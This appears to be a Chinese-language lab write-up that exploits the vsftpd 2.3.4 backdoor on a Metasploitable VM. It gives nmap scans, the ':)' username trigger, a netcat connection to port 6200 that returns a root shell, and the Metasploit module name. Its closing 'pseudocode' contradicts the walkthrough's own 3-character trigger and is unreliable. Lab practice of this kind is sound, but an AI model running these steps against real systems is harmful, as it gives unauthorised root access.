笑脸漏洞
目前网络:mp和kali都是NAT模式,连的是手机热点
在ifconfig得知本机ip为192.168.75.133,用nmap扫描网段
nmap 192.168.75.0/24
nmap 网关ip/24
┌──(root㉿kali)-[/home/kali]
└─# nmap 192.168.75.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:09 CST
Nmap scan report for 192.168.75.1
Host is up (0.00036s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2869/tcp open icslap
6881/tcp open bittorrent-tracker
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.75.2
Host is up (0.00022s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
MAC Address: 00:50:56:EE:63:B9 (VMware)
Nmap scan report for 192.168.75.132
Host is up (0.0019s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Nmap scan report for 192.168.75.254
Host is up (0.0011s latency).
All 1000 scanned ports on 192.168.75.254 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:50:56:FA:97:6D (VMware)
Nmap scan report for 192.168.75.133
Host is up (0.0000040s latency).
All 1000 scanned ports on 192.168.75.133 are in ignored states.
Not shown: 1000 closed tcp ports (reset)
Nmap done: 256 IP addresses (5 hosts up) scanned in 8.10 seconds
可以看出来mp的ip应该是192.168.75.132
看下每个端口的服务是什么
nmap -sV 靶机ip
┌──(root㉿kali)-[/home/kali]
└─# nmap -sV 192.168.75.132
Starting Nmap 7.94 ( https://nmap.org ) at 2024-10-25 11:12 CST
Nmap scan report for 192.168.75.132
Host is up (0.0025s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login OpenBSD or Solaris rlogind
514/tcp open tcpwrapped
1099/tcp open java-rmi GNU Classpath grmiregistry
1524/tcp open bindshell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc UnrealIRCd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Service Info: Hosts: metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.45 seconds
利用netcat与21端口建立连接
nc 靶机ip 目标端口
┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 21
220 (vsFTPd 2.3.4)
220状态码表示服务已准备好
接下里输入(用户名字里得带英文键的:)用作结尾,这里以a:)为例)
user a:)
提示331码(表示需要密码)后
然后输入(随便输入,这里以123为例)
pass 123
在显示421 Timeout前
打开另一个命令行
用nmap扫描靶机的6200端口
nmap -p 目标端口 靶机ip
┌──(root㉿kali)-[/home/kali]
└─# nmap -p 6200 192.168.75.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 11:34 CST
Nmap scan report for 192.168.75.132
Host is up (0.00048s latency).
PORT STATE SERVICE
6200/tcp open lm-x
MAC Address: 00:0C:29:8F:5D:C1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
可以看到是开着的
现在用netcat连下6200端口
nc 靶机ip 目标端口
┌──(root㉿kali)-[/home/kali]
└─# nc 192.168.75.132 6200
whoami
root
^C
连接后输入whoami
显示root
说明此时有了管理员权限了
在mp上查看该漏洞
输入msfconsole打开mp
输入search vsftpd 2.3.4
输入
use exploit/unix/ftp/vsftpd_234_backdoor
info
脚本:
/* vsftpd login handling pseudocode demonstration */
int handle_user_login(const char* username) {
char user_buf[512];
strncpy(user_buf, username, sizeof(user_buf) - 1);
user_buf[sizeof(user_buf) - 1] = '\0';
/* 检查用户名中是否包含:) */
if (strlen(user_buf) > 6) {
char* ptr = strstr(user_buf, ":)");
if (ptr != NULL) {
/* 触发后门逻辑 */
if (fork() == 0) {
/* 子进程 */
int sockfd = create_socket();
bind_port(sockfd, 6200);
listen_and_handle(sockfd);
exit(0);
}
return -1; // 返回登录失败
}
}
return validate_normal_login(user_buf);
}
void process_login_request(int client_fd) {
char username[512];
receive_username(client_fd, username);
int login_result = handle_user_login(username);
if (login_result < 0) {
send_login_failed(client_fd);
}
}
- 在用户名中包含:)字符串
- 会触发一个特殊的代码路径
- 会在端口6200上打开一个后门监听
- 这个后门会以root权限运行
- 允许未经授权的命令执行
